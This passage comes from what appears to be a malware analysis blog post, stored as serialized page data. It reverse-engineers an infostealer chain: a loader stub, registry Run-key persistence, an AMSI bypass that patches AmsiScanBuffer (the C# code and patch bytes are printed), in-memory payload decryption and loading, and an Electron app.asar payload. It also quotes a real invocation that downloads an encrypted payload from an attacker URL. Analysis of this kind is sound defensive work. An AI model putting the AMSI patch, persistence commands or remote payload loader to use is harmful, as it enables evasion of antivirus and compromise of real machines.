This separation of duties allowed the attackers to:",[1255,5622,5623,5626,5629],{},[1258,5624,5625],{},"Avoid correlation by static AV or sandbox systems",[1258,5627,5628],{},"Swap or update payloads without modifying the loader",[1258,5630,5631],{},"Reduce behavioral signals at the entry point",[12,5633,5634,5635,5638],{},"This pattern is typical in ",[251,5636,5637],{},"malware-as-a-service (MaaS)"," operations, where delivery mechanisms are generic and payloads are modular or client-specific.",[12,5640,5030,5641,5643],{},[63,5642,4614],{}," provided just enough logic to serve as a reliable and stealthy entry point — nothing more, but also nothing less.",[41,5645,5647],{"id":5646},"_34-persistence-via-registry-confirmed-in-astorpy","3.4 Persistence via Registry (Confirmed in astor.py)",[12,5649,47],{},[12,5651,5652,5653,5655],{},"Static analysis of the Python payload revealed that ",[63,5654,4614],{}," is explicitly persisted using a registry autorun entry:",[1255,5657,5658,5666,5674],{},[1258,5659,5660,1062,5663],{},[251,5661,5662],{},"Registry Path",[63,5664,5665],{},"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",[1258,5667,5668,1062,5671],{},[251,5669,5670],{},"Value Name",[63,5672,5673],{},"Realtek Audio",[1258,5675,5676,1062,5679],{},[251,5677,5678],{},"Payload Path",[63,5680,5681],{},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[12,5683,5684],{},"The corresponding registry command is executed via PowerShell:",[56,5686,5690],{"className":5687,"code":5688,"language":5689,"meta":65,"style":65},"language-powershell shiki shiki-themes github-light github-dark","reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Realtek Audio\" /t REG_SZ /d \"...\\Updater.exe\" /f\n","powershell",[63,5691,5692],{"__ignoreMap":65},[102,5693,5694],{"class":104,"line":105},[102,5695,5688],{},[12,5697,5698],{},"This ensures the malware is launched at every user login. 
The file is also marked with hidden and system attributes to further evade detection:",[56,5700,5702],{"className":5687,"code":5701,"language":5689,"meta":65,"style":65},"attrib +h +s \"Updater.exe\"\n",[63,5703,5704],{"__ignoreMap":65},[102,5705,5706],{"class":104,"line":105},[102,5707,5701],{},[12,5709,5710],{},"This persistence mechanism was embedded directly into the astor.py code, confirming that the final-stage stealer actively maintains loader presence on disk and in the startup registry.",[41,5712,5714],{"id":5713},"_35-summary","3.5 Summary",[12,5716,47],{},[2109,5718,5719],{},[12,5720,5721,5722,5724],{},"While ",[63,5723,4614],{}," was not inherently malicious in structure or content, its contextual behavior within the execution chain confirmed its role as a malware loader.",[52,5726],{"className":5727},[4854],[12,5729,5730],{},"This binary served as a clean, minimalistic first-stage launcher — avoiding detection by static analysis, AV engines, and behavioral rules. Its design focused purely on stealth and operational support, not on executing malicious logic itself.",[12,5732,5733,5734,5736,5737,5739,5740,5743],{},"However, its role extended beyond initial deployment. During reverse engineering of the ",[63,5735,4622],{}," payload, we identified logic that actively checked for the presence of ",[63,5738,4614],{},". This check was part of a broader ",[251,5741,5742],{},"health and self-healing cycle"," implemented within the stealer code — a mechanism designed to verify the integrity of the infection chain and restore missing components if needed.",[12,5745,5746,5747,5749,5750,5753],{},"This means that ",[63,5748,4614],{}," was not only responsible for initiating the malware, but also formed part of its ",[251,5751,5752],{},"ongoing runtime validation",". 
Without this stub, the malware could lose its ability to reinitialize in future sessions.",[12,5755,5756],{},[251,5757,5758,5759,1551],{},"Key Functions of ",[63,5760,4614],{},[1255,5762,5763,5768,5773,5776],{},[1258,5764,5765,5766],{},"Seamless deployment of ",[63,5767,4618],{},[1258,5769,5770,5771],{},"Indirect execution of ",[63,5772,4622],{},[1258,5774,5775],{},"Decoupling of loader and payload logic",[1258,5777,5778,5781],{},[251,5779,5780],{},"Referenced by the payload itself"," as part of operational health monitoring",[12,5783,5784],{},"In Section 5, we will detail the internal health-check routines of the stealer, including its self-healing behavior and integrity validation mechanisms.",[12,5786,5787,5788,5790],{},"For now, it is clear that ",[63,5789,4614],{}," served as both ignition and anchor point in this layered infostealer architecture.",[41,5792,5794],{"id":5793},"_36-extraction-trick-outsmarting-the-loader","3.6 Extraction Trick: Outsmarting the Loader",[12,5796,47],{},[12,5798,5799],{},"Sometimes, the best reverse engineering results don’t come from deep binary disassembly — but from a bit of trickery and patience.",[12,5801,5802,5803,5805,5806,5808],{},"While analyzing the infection in a controlled lab environment, we noticed something odd: ",[63,5804,4614],{}," was present and executing, but ",[63,5807,4618],{}," had vanished from the file system. That’s when we had an idea — what happens if we let the malware repair itself?",[12,5810,5811,5812,5817,5818,5820],{},"We deliberately ",[251,5813,5814,5815],{},"deleted ",[63,5816,4618],{}," from the infected environment while leaving ",[63,5819,4614],{}," untouched. 
And sure enough, after the next user session login, the loader sprang into action — not with a tantrum, but with a quiet attempt to rebuild its second stage.",[12,5822,5823,5824,805,5826,5828,5829,5832,5833,5836,5837,805,5839,5842,5843,5845],{},"Here’s where it got interesting: Instead of directly recreating ",[63,5825,4618],{},[63,5827,4614],{}," first dropped a file named ",[63,5830,5831],{},"app-64.7z"," — a standard ",[251,5834,5835],{},"7-Zip archive",". This archive contained the full Electron application structure, including ",[63,5838,4618],{},[63,5840,5841],{},"resources",", and the ",[63,5844,5068],{}," payload with all embedded logic.",[12,5847,5848,5849,1014],{},"We had effectively ",[251,5850,5851],{},"forced the malware to hand us the source package",[12,5853,5854],{},[2772,5855],{"alt":5856,"src":5857},"Suspicious Updater Executable Detected","https://res.cloudinary.com/c4a8/image/upload/v1749797290/blog/pics/updater-exe.png",[12,5859,5860],{},"With this 7z archive in hand, we were able to extract, decompress, and fully reverse the JavaScript-based orchestration logic without even touching the original loader again. The archive structure matched the expected Electron app layout perfectly.",[12,5862,5863,5864,5867],{},"This behavior strongly suggests that the attackers deliberately chose a ",[251,5865,5866],{},"modular and maintainable architecture",", using archives as flexible payload containers. It also allowed them to swap or update payload components without recompiling the loader binary.",[12,5869,5870],{},"And in our case? 
It allowed us to outsmart their chain, intercept the drop, and walk away with the full package — like stealing the blueprints off the workbench while the builder wasn’t looking.",[12,5872,5873,5874],{},"Let’s just say: ",[251,5875,5876,5877,805,5880,5883],{},"sometimes the best forensic tools are ",[63,5878,5879],{},"del",[63,5881,5882],{},"wait",", and a little curiosity.",[25,5885,5887,5888],{"id":5886},"_4-deep-dive-powbat","4. Deep Dive: ",[63,5889,5890],{},"pow.bat",[12,5892,31],{},[12,5894,5895,5896,5899],{},"In the analyzed malware campaign, the component ",[63,5897,5898],{},"Invoke-SharpLoader"," acts as a custom, memory-resident .NET loader that exhibits a highly modular and evasive execution flow. This section dissects its internal architecture, its anti-analysis strategy via AMSI patching, and its role in facilitating the second stage payload.",[41,5901,5903],{"id":5902},"_41-binary-properties-sharploader-batch-wrapper","4.1 Binary Properties – SharpLoader Batch Wrapper",[12,5905,47],{},[12,5907,5908,5909,5911],{},"Before being executed to load the .NET payload in memory, the outer wrapper ",[63,5910,5890],{}," shows the following characteristics based on static analysis:",[417,5913,5914,5922],{},[422,5915,5916],{},[426,5917,5918,5920],{},[430,5919,5418],{},[430,5921,5421],{},[438,5923,5924,5933,5942,5952,5961,5971,5981,5990],{},[426,5925,5926,5930],{},[443,5927,5928],{},[251,5929,5430],{},[443,5931,5932],{},"DOS Batch File",[426,5934,5935,5939],{},[443,5936,5937],{},[251,5938,5440],{},[443,5940,5941],{},"Script-based (not compiled binary)",[426,5943,5944,5949],{},[443,5945,5946],{},[251,5947,5948],{},"File Size:",[443,5950,5951],{},"27.79 KB (28454 bytes)",[426,5953,5954,5958],{},[443,5955,5956],{},[251,5957,5460],{},[443,5959,5960],{},"Normal (plain ASCII text)",[426,5962,5963,5968],{},[443,5964,5965],{},[251,5966,5967],{},"Magic:",[443,5969,5970],{},"DOS batch file, ASCII text",[426,5972,5973,5978],{},[443,5974,5975],{},[251,5976,5977],{},"Digital 
Signature:",[443,5979,5980],{},"None detected",[426,5982,5983,5987],{},[443,5984,5985],{},[251,5986,5480],{},[443,5988,5989],{},"26 / 61 (at time of analysis)",[426,5991,5992,5997],{},[443,5993,5994],{},[251,5995,5996],{},"Threat Labels:",[443,5998,5999,805,6002,805,6005,805,6007],{},[63,6000,6001],{},"trojan",[63,6003,6004],{},"downloader",[63,6006,5689],{},[63,6008,6009],{},"agentb",[12,6011,6012,6013,6016],{},"Despite being a simple ",[63,6014,6015],{},".bat"," file, the script evades many static detections and relies heavily on living-off-the-land techniques such as PowerShell to download and execute obfuscated and encrypted payloads.",[41,6018,6020,6021,1289],{"id":6019},"_42-amsi-bypass-technique-class-gofor4msi","4.2 AMSI Bypass Technique (Class: ",[63,6022,6023],{},"gofor4msi",[12,6025,47],{},[12,6027,6028],{},"One of the first defensive mechanisms bypassed by SharpLoader is AMSI — the Anti-Malware Scan Interface — a Microsoft feature integrated into scripting engines like PowerShell and Windows Script Host to provide real-time content scanning for suspicious behavior. Malware authors often attempt to bypass AMSI to avoid detection by endpoint protection systems.",[12,6030,6031,6032,6035,6036,6039,6040,6043,6044,6047,6048,6051],{},"In SharpLoader, the AMSI bypass is implemented through ",[251,6033,6034],{},"direct in-memory patching"," of the ",[63,6037,6038],{},"AmsiScanBuffer"," function within the ",[63,6041,6042],{},"amsi.dll",". 
This function is normally responsible for analyzing script content and returning a result code indicating whether the content is suspicious (",[63,6045,6046],{},"AMSI_RESULT_DETECTED",") or safe (",[63,6049,6050],{},"AMSI_RESULT_CLEAN",").",[12,6053,6054],{},"The relevant in-memory patching code is:",[56,6056,6060],{"className":6057,"code":6058,"language":6059,"meta":65,"style":65},"language-csharp shiki shiki-themes github-light github-dark","var lib = Win32.LoadLibrary(\"amsi.dll\");\nvar addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\nWin32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\nMarshal.Copy(patch, 0, addr, patch.Length);\n","csharp",[63,6061,6062,6067,6072,6077],{"__ignoreMap":65},[102,6063,6064],{"class":104,"line":105},[102,6065,6066],{},"var lib = Win32.LoadLibrary(\"amsi.dll\");\n",[102,6068,6069],{"class":104,"line":111},[102,6070,6071],{},"var addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\n",[102,6073,6074],{"class":104,"line":329},[102,6075,6076],{},"Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\n",[102,6078,6079],{"class":104,"line":346},[102,6080,6081],{},"Marshal.Copy(patch, 0, addr, patch.Length);\n",[12,6083,6084],{},"This sequence performs the following steps:",[6086,6087,6088,6097,6108,6118],"ol",{},[1258,6089,6090,6093,6094,1014],{},[251,6091,6092],{},"Load the AMSI DLL"," into the process using ",[63,6095,6096],{},"LoadLibrary(\"amsi.dll\")",[1258,6098,6099,6102,6103,4623,6105,1014],{},[251,6100,6101],{},"Resolve the memory address"," of the function ",[63,6104,6038],{},[63,6106,6107],{},"GetProcAddress()",[1258,6109,6110,6113,6114,6117],{},[251,6111,6112],{},"Change the memory protection"," of the address using ",[63,6115,6116],{},"VirtualProtect()"," to make it writable.",[1258,6119,6120,6123,6124,6127],{},[251,6121,6122],{},"Overwrite the beginning of the function"," using ",[63,6125,6126],{},"Marshal.Copy()"," with a small shellcode patch.",[12,6129,6130],{},"The patch 
applied for 64-bit systems is:",[56,6132,6134],{"className":6057,"code":6133,"language":6059,"meta":65,"style":65},"static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret\n",[63,6135,6136],{"__ignoreMap":65},[102,6137,6138],{"class":104,"line":105},[102,6139,6133],{},[12,6141,6142],{},"This corresponds to the following instructions:",[1255,6144,6145,6154],{},[1258,6146,6147,6150,6151],{},[63,6148,6149],{},"mov eax, 0x80070057"," → sets the return code to the Windows error code ",[63,6152,6153],{},"E_INVALIDARG",[1258,6155,6156,6159],{},[63,6157,6158],{},"ret"," → immediately returns from the function",[12,6161,6162,6163,6165],{},"This effectively causes ",[63,6164,6038],{}," to fail silently and return a non-detection result, neutralizing AMSI checks. The malware can now execute scripts or .NET code that would otherwise trigger antivirus alerts.",[12,6167,6168],{},"If executed on a 32-bit system, a different patch is applied:",[56,6170,6172],{"className":6057,"code":6171,"language":6059,"meta":65,"style":65},"static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; // mov eax, ...; ret 0x18\n",[63,6173,6174],{"__ignoreMap":65},[102,6175,6176],{"class":104,"line":105},[102,6177,6171],{},[12,6179,6180],{},"This reflects the same goal — forcing a \"clean\" result — but adapted to the x86 calling convention.",[12,6182,6183,6184,805,6187,6190,6191,6194],{},"Using raw P/Invoke calls like ",[63,6185,6186],{},"LoadLibrary",[63,6188,6189],{},"GetProcAddress",", and ",[63,6192,6193],{},"VirtualProtect"," allows this patching to be done dynamically and without invoking any high-level APIs that might be monitored by EDR tools. This method is compact, effective, and leaves minimal forensic artifacts.",[12,6196,6197,6198,6201],{},"In summary, this AMSI bypass technique is a ",[251,6199,6200],{},"low-level, direct memory attack on the antivirus interface",", carried out in milliseconds during runtime. 
It's a powerful example of why behavioral monitoring and memory inspection are essential in modern endpoint defense systems.",[41,6203,6205],{"id":6204},"_43-stage-2-payload-handling","4.3 Stage 2 Payload Handling",[12,6207,47],{},[12,6209,6210,6211,6214],{},"After the AMSI bypass is complete, the loader proceeds to retrieve and prepare the second-stage payload. This payload is not embedded in the loader itself but is fetched either from a remote server or read from disk — depending on how the loader is invoked via the ",[63,6212,6213],{},"$location"," parameter.",[12,6216,6217,6218,6221,6222,6225,6226,6229,6230,6233,6234,6237],{},"If the location begins with ",[63,6219,6220],{},"http",", it is interpreted as a URL and the loader uses ",[63,6223,6224],{},"Get_Stage2()"," to download the payload via ",[63,6227,6228],{},"HttpWebRequest",". If it is a local path, ",[63,6231,6232],{},"Get_Stage2disk()"," reads the contents directly from the file system. In both cases, the expected file content is a ",[251,6235,6236],{},"Base64-encoded, GZip-compressed, and AES-encrypted"," blob.",[12,6239,6240,6241,6244],{},"The loader then performs a ",[251,6242,6243],{},"four-stage decoding and decryption pipeline"," entirely in memory:",[6086,6246,6247,6253,6263,6273],{},[1258,6248,6249,6252],{},[251,6250,6251],{},"Base64 Decoding",": Converts the encoded string into raw bytes. This step is designed to obscure the actual binary content from static inspection tools and prevents straightforward pattern matching.",[1258,6254,6255,6258,6259,6262],{},[251,6256,6257],{},"GZip Decompression",": The decoded bytes are passed to a ",[63,6260,6261],{},"GZipStream",", which decompresses the payload. Compression reduces file size and adds another layer of obfuscation.",[1258,6264,6265,6268,6269,6272],{},[251,6266,6267],{},"AES Decryption",": The compressed bytes are decrypted using AES (Rijndael) in CBC mode. 
The key is derived at runtime from the user-provided password using SHA-256 hashing combined with PBKDF2 (",[63,6270,6271],{},"Rfc2898DeriveBytes",") and a static salt.",[1258,6274,6275,6278],{},[251,6276,6277],{},"Salt Removal",": The decrypted result still contains a fixed-length salt prefix (4 bytes). These bytes are removed manually to obtain the clean binary blob that represents a valid .NET assembly.",[12,6280,6281],{},"The decryption pipeline is executed like so:",[56,6283,6285],{"className":6057,"code":6284,"language":6059,"meta":65,"style":65},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\nbyte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[63,6286,6287,6292],{"__ignoreMap":65},[102,6288,6289],{"class":104,"line":105},[102,6290,6291],{},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\n",[102,6293,6294],{"class":104,"line":111},[102,6295,6296],{},"byte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[12,6298,6299,6300,6303],{},"Here, ",[63,6301,6302],{},"AES_Decrypt()"," is a custom function that wraps the Rijndael algorithm, configured with a 256-bit key and a 128-bit IV (initialization vector), both derived from the password.",[12,6305,6306],{},[251,6307,6308],{},"Key Design Observations:",[1255,6310,6311,6314,6317],{},[1258,6312,6313],{},"The use of AES-CBC with PBKDF2 makes brute-forcing the password non-trivial.",[1258,6315,6316],{},"Since decryption happens in memory, no intermediate results are ever written to disk — reducing forensic artifacts.",[1258,6318,6319],{},"If the wrong password is supplied, decryption silently fails or produces invalid data, which may lead to failed execution or hard-to-trace exceptions.",[12,6321,6322],{},"In summary, this multi-stage payload handling approach significantly raises the bar for both signature- and heuristic-based static detection. 
Without live execution or deep inspection of the loader's behavior, defenders are unlikely to uncover the embedded payload unless they also know the password and the exact decoding logic.",[41,6324,6326],{"id":6325},"_44-dynamic-assembly-loading","4.4 Dynamic Assembly Loading",[12,6328,47],{},[12,6330,6331],{},"Once the second-stage payload has been successfully decrypted, the resulting byte array represents a valid .NET assembly. Instead of writing this assembly to disk — a common indicator for antivirus or EDR systems — SharpLoader executes it directly in memory using reflection:",[56,6333,6335],{"className":6057,"code":6334,"language":6059,"meta":65,"style":65},"Assembly a = Assembly.Load(bin);\na.EntryPoint.Invoke(null, new object[] { commands });\n",[63,6336,6337,6342],{"__ignoreMap":65},[102,6338,6339],{"class":104,"line":105},[102,6340,6341],{},"Assembly a = Assembly.Load(bin);\n",[102,6343,6344],{"class":104,"line":111},[102,6345,6346],{},"a.EntryPoint.Invoke(null, new object[] { commands });\n",[12,6348,6349,6350,6353],{},"This technique is referred to as ",[251,6351,6352],{},"fileless execution",". 
It is highly evasive because it:",[1255,6355,6356,6359,6362],{},[1258,6357,6358],{},"Avoids touching the disk, leaving no file-based IOCs (indicators of compromise)",[1258,6360,6361],{},"Makes traditional forensic acquisition harder, as no binary is saved on disk",[1258,6363,6364],{},"Evades static signature-based detection, since AV engines often rely on scanning files",[12,6366,6367,6368,6371,6372,6375],{},"If the ",[63,6369,6370],{},"EntryPoint"," is not ",[63,6373,6374],{},"static",", the loader includes fallback logic:",[56,6377,6379],{"className":6057,"code":6378,"language":6059,"meta":65,"style":65},"MethodInfo method = a.EntryPoint;\nif (method != null)\n{\n    object o = a.CreateInstance(method.Name);\n    method.Invoke(o, null);\n}\n",[63,6380,6381,6386,6391,6396,6401,6406],{"__ignoreMap":65},[102,6382,6383],{"class":104,"line":105},[102,6384,6385],{},"MethodInfo method = a.EntryPoint;\n",[102,6387,6388],{"class":104,"line":111},[102,6389,6390],{},"if (method != null)\n",[102,6392,6393],{"class":104,"line":329},[102,6394,6395],{},"{\n",[102,6397,6398],{"class":104,"line":346},[102,6399,6400],{},"    object o = a.CreateInstance(method.Name);\n",[102,6402,6403],{"class":104,"line":650},[102,6404,6405],{},"    method.Invoke(o, null);\n",[102,6407,6408],{"class":104,"line":656},[102,6409,6410],{},"}\n",[12,6412,6413,6414,6417],{},"This ensures compatibility with assemblies that require an instantiated object for execution (e.g., ",[63,6415,6416],{},"public int Main()"," inside a class instance). 
The code dynamically creates an instance of the class and then calls the entry point method.",[12,6419,6420],{},"Combined with the AMSI bypass and in-memory decryption, this mechanism delivers the final payload to execution in a stealthy, fully fileless manner — a hallmark of modern, evasive malware.",[41,6422,6424],{"id":6423},"_45-command-line-parameters-and-flexibility","4.5 Command Line Parameters and Flexibility",[12,6426,47],{},[12,6428,6429,6430,6432],{},"The PowerShell function ",[63,6431,5898],{}," is designed to act as a flexible wrapper for arbitrary .NET payloads. It supports dynamic input of both the payload location and arguments, allowing a single loader instance to be reused across multiple operations or campaigns.",[12,6434,6435],{},[251,6436,6437],{},"Supported Parameters:",[1255,6439,6440,6446,6452,6472],{},[1258,6441,6442,6445],{},[63,6443,6444],{},"-location"," (mandatory): Specifies either a URL or a local file path to the encrypted stage-two payload.",[1258,6447,6448,6451],{},[63,6449,6450],{},"-password"," (mandatory): Used to derive the AES decryption key.",[1258,6453,6454,805,6457,805,6460,6463,6464,6467,6468,6471],{},[63,6455,6456],{},"-argument",[63,6458,6459],{},"-argument2",[63,6461,6462],{},"-argument3"," (optional): These are forwarded directly to the ",[63,6465,6466],{},".NET"," assembly’s ",[63,6469,6470],{},"Main()"," method via reflection.",[1258,6473,6474,6477],{},[63,6475,6476],{},"-noArgs",": Triggers execution without passing any parameters to the second-stage payload.",[12,6479,6480],{},"Internally, the arguments are collected and forwarded like this (C# inside the loader):",[56,6482,6484],{"className":6057,"code":6483,"language":6059,"meta":65,"style":65},"object[] cmd = args.Skip(2).ToArray();\na.EntryPoint.Invoke(null, new object[] { cmd });\n",[63,6485,6486,6491],{"__ignoreMap":65},
[102,6487,6488],{"class":104,"line":105},[102,6489,6490],{},"object[] cmd = args.Skip(2).ToArray();\n",[102,6492,6493],{"class":104,"line":111},[102,6494,6495],{},"a.EntryPoint.Invoke(null, new object[] { cmd });\n",[12,6497,6498],{},"This means that the .NET payload is expected to have a signature like:",[56,6500,6502],{"className":6057,"code":6501,"language":6059,"meta":65,"style":65},"static void Main(string[] args)\n",[63,6503,6504],{"__ignoreMap":65},[102,6505,6506],{"class":104,"line":105},[102,6507,6501],{},[12,6509,6510,6511,6513],{},"or it will gracefully fall back to the parameterless ",[63,6512,6470],{}," variant. This behavior allows red teams or malware authors to create multi-purpose second stages that can perform different operations depending on the input — for example, launching an implant, collecting system info, or initiating C2 communication.",[12,6515,6516],{},"Such modularity and configurability are key features of advanced malware frameworks, and they illustrate how script-based loaders can behave as highly adaptive execution environments for downstream payloads.",[41,6518,6520],{"id":6519},"_46-real-world-usage-example","4.6 Real-World Usage Example",[12,6522,47],{},[12,6524,6525],{},"To illustrate SharpLoader’s real-world execution in an actual campaign, consider the following invocation seen in the wild:",[56,6527,6529],{"className":5687,"code":6528,"language":5689,"meta":65,"style":65},"Invoke-SharpLoader -location \"https://cosmoplwnets.xyz/.well-known/pki-validation/calc.enc\" -password UwUFufu1 -noArgs\n",[63,6530,6531],{"__ignoreMap":65},[102,6532,6533],{"class":104,"line":105},[102,6534,6528],{},[12,6536,6537],{},"This example highlights the typical use case of SharpLoader:",[1255,6539,6540,6554,6566,6576],{},[1258,6541,6542,6545,6546,6549,6550,6553],{},[251,6543,6544],{},"Location Argument",": The URL points to a remote server hosting ",[63,6547,6548],{},"calc.enc",", a concealed second-stage payload. 
The endpoint is located under a legitimate-looking ",[63,6551,6552],{},".well-known"," directory, often used for HTTPS certificate validation, which helps blend the URL into legitimate web traffic.",[1258,6555,6556,1062,6559,6561,6562,6565],{},[251,6557,6558],{},"Payload Characteristics",[63,6560,6548],{}," is a ",[251,6563,6564],{},"triple-obfuscated file"," — Base64-encoded, GZip-compressed, and AES-encrypted. This obfuscation pipeline ensures the payload is opaque to most detection mechanisms unless fully executed and decrypted in memory.",[1258,6567,6568,6571,6572,6575],{},[251,6569,6570],{},"Password Argument",": The string ",[63,6573,6574],{},"UwUFufu1"," is used at runtime to derive the AES key via SHA-256 and PBKDF2. Without this password, the payload cannot be decrypted, making offline analysis without context nearly impossible.",[1258,6577,6578,6581,6582,6584],{},[251,6579,6580],{},"No Additional Arguments",": The ",[63,6583,6476],{}," switch indicates that no command-line parameters are passed to the decrypted .NET assembly, triggering its default execution path.",[12,6586,6587,6588,6591],{},"This stealthy invocation chain encapsulates SharpLoader’s core purpose: ",[251,6589,6590],{},"fileless, adaptive, and secure payload delivery"," through simple PowerShell syntax with maximum obfuscation and evasion.",[41,6593,6595],{"id":6594},"_47-summary","4.7 Summary",[12,6597,47],{},[12,6599,6600,6601,6603],{},"The ",[63,6602,5898],{}," construct exemplifies a highly refined and evasive malware staging technique that leverages native system components, reflection, and cryptography to operate almost entirely in-memory.",[12,6605,6606],{},[251,6607,6608],{},"Key Highlights:",[1255,6610,6611,6620,6626,6632],{},[1258,6612,6613,6616,6617,6619],{},[251,6614,6615],{},"Bypassing AMSI",": Direct in-memory patching of ",[63,6618,6038],{}," disables antivirus inspection without invoking detectable APIs.",[1258,6621,6622,6625],{},[251,6623,6624],{},"Secure Payload 
Handling",": Retrieval of encrypted and compressed stage-two payloads ensures confidentiality and adds multiple layers of evasion.",[1258,6627,6628,6631],{},[251,6629,6630],{},"Memory-Only Execution",": Decrypted payloads are never written to disk, making detection by traditional file-based scanners nearly impossible.",[1258,6633,6634,6637],{},[251,6635,6636],{},"Modular and Reusable Architecture",": Through PowerShell parameters, SharpLoader can be flexibly reused across campaigns with varying payloads and runtime behaviors.",[25,6639,6641,6642,6644],{"id":6640},"_5-deep-dive-mainexe-electron-based-malware-loader","5. Deep Dive: ",[63,6643,4618],{}," – Electron-Based Malware Loader",[12,6646,31],{},[12,6648,6649,6650,6652,6653,6656,6657,6659,6660,6662],{},"During reverse engineering, it became clear that ",[63,6651,4618],{},", flagged by Microsoft Defender for Endpoint, was not a conventional binary but an ",[251,6654,6655],{},"Electron-based malware loader",". It was delivered inside an archive named ",[63,6658,5831],{},", which ",[63,6661,4614],{}," downloaded and extracted at runtime. 
Once unpacked, the structure and contents strongly resembled a typical Electron application.",[41,6664,6666],{"id":6665},"_51-recognizing-electron-structure","5.1 Recognizing Electron Structure",[12,6668,47],{},[12,6670,6671],{},"The extracted folder included files such as:",[1255,6673,6674,6685,6693,6699],{},[1258,6675,6676,805,6679,805,6682],{},[63,6677,6678],{},"chrome_100_percent.pak",[63,6680,6681],{},"v8_context_snapshot.bin",[63,6683,6684],{},"d3dcompiler_47.dll",[1258,6686,6687,4598,6690],{},[63,6688,6689],{},"LICENSES.chromium",[63,6691,6692],{},"LICENSES.electron",[1258,6694,6695,6696,6698],{},"A large ",[63,6697,4618],{}," binary (~150 MB)",[1258,6700,6701,6702,6704,6705,6707,6708],{},"A ",[63,6703,5841],{}," folder containing ",[63,6706,5068],{}," and a secondary binary ",[63,6709,6710],{},"elevate.exe",[12,6712,6713],{},[2772,6714],{"alt":6715,"src":6716},"Packaged Windows 64-bit version of the desktop app","https://res.cloudinary.com/c4a8/image/upload/v1749796955/blog/pics/electron-app-windows-x64.png",[12,6718,6719,6720,6722],{},"These are all strong indicators of an Electron app, which uses Chromium and Node.js to package JavaScript-based desktop applications. The presence of ",[63,6721,6710],{},", a signed Microsoft binary often used to escalate privileges, raised further suspicion—it could be abused to launch child processes with elevated rights.",[41,6724,6726],{"id":6725},"_52-unpacking-and-static-analysis-deep-dive","5.2 Unpacking and Static Analysis (Deep Dive)",[12,6728,47],{},[12,6730,6731,6732,6734,6735,6737,6738,6740,6741,6743,6744,6747],{},"Rather than executing ",[63,6733,4618],{},", I opted for a static analysis approach to avoid triggering any live behavior. My initial suspicion that ",[63,6736,4618],{}," was built with Electron was confirmed by locating the ",[63,6739,5068],{}," file inside the ",[63,6742,5841],{}," directory. 
In Electron apps, this archive contains all core application logic, such as JavaScript files, configuration (",[63,6745,6746],{},"package.json","), and assets, packed into a custom format for performance and obfuscation purposes.",[12,6749,6600,6750,6753,6754,6757],{},[63,6751,6752],{},".asar"," archive is essentially a read-only, high-performance container similar to ",[63,6755,6756],{},".zip",", but optimized for Electron’s runtime. While not encrypted, it obfuscates code access, making static analysis more challenging unless unpacked.",[12,6759,6760,6761,6764],{},"To unpack it, I used the official ",[63,6762,6763],{},"asar"," tool provided via npm. The steps were:",[56,6766,6768],{"className":262,"code":6767,"language":264,"meta":65,"style":65},"npm install -g asar\nasar extract app.asar extracted_app\n",[63,6769,6770,6784],{"__ignoreMap":65},[102,6771,6772,6775,6778,6781],{"class":104,"line":105},[102,6773,6774],{"class":271},"npm",[102,6776,6777],{"class":289}," install",[102,6779,6780],{"class":275}," -g",[102,6782,6783],{"class":289}," asar\n",[102,6785,6786,6788,6791,6794],{"class":104,"line":111},[102,6787,6763],{"class":271},[102,6789,6790],{"class":289}," extract",[102,6792,6793],{"class":289}," app.asar",[102,6795,6796],{"class":289}," extracted_app\n",[12,6798,6799,6800,6803],{},"Running the above commands extracted the content into a working folder (",[63,6801,6802],{},"extracted_app/","), which revealed the actual JavaScript application code. This included:",[1255,6805,6806,6827,6835],{},[1258,6807,6808,805,6811,805,6814,6817,6818,6820,6821,6823,6824,6826],{},[63,6809,6810],{},"jscryter.js",[63,6812,6813],{},"input.js",[63,6815,6816],{},"obf.js",": These scripts form the malware logic. 
",[63,6819,6810],{}," appears to orchestrate payload delivery, ",[63,6822,6813],{}," defines configuration constants or command logic, and ",[63,6825,6816],{}," is a heavily obfuscated script likely containing the core payload logic.",[1258,6828,6829,805,6831,6834],{},[63,6830,6746],{},[63,6832,6833],{},"package-lock.json",": Define the runtime environment",[1258,6836,6837,6840,6841,805,6844,805,6847],{},[63,6838,6839],{},"node_modules/",": Contains all dependencies like ",[63,6842,6843],{},"axios",[63,6845,6846],{},"adm-zip",[63,6848,6849],{},"child_process",[12,6851,6852,6853,6855,6856,1014],{},"The unpacked contents enabled complete visibility into the logic of the malware without requiring execution, which was essential for safe reverse engineering. This step confirmed that ",[63,6854,4618],{}," served purely as a runtime wrapper for the malicious scripts hidden inside ",[63,6857,5068],{},[41,6859,6861],{"id":6860},"_53-what-the-static-analysis-revealed","5.3. What the Static Analysis Revealed",[12,6863,47],{},[12,6865,6866],{},"By manually inspecting the code, I confirmed the malware logic was fully JavaScript-based, executed within the Electron runtime. 
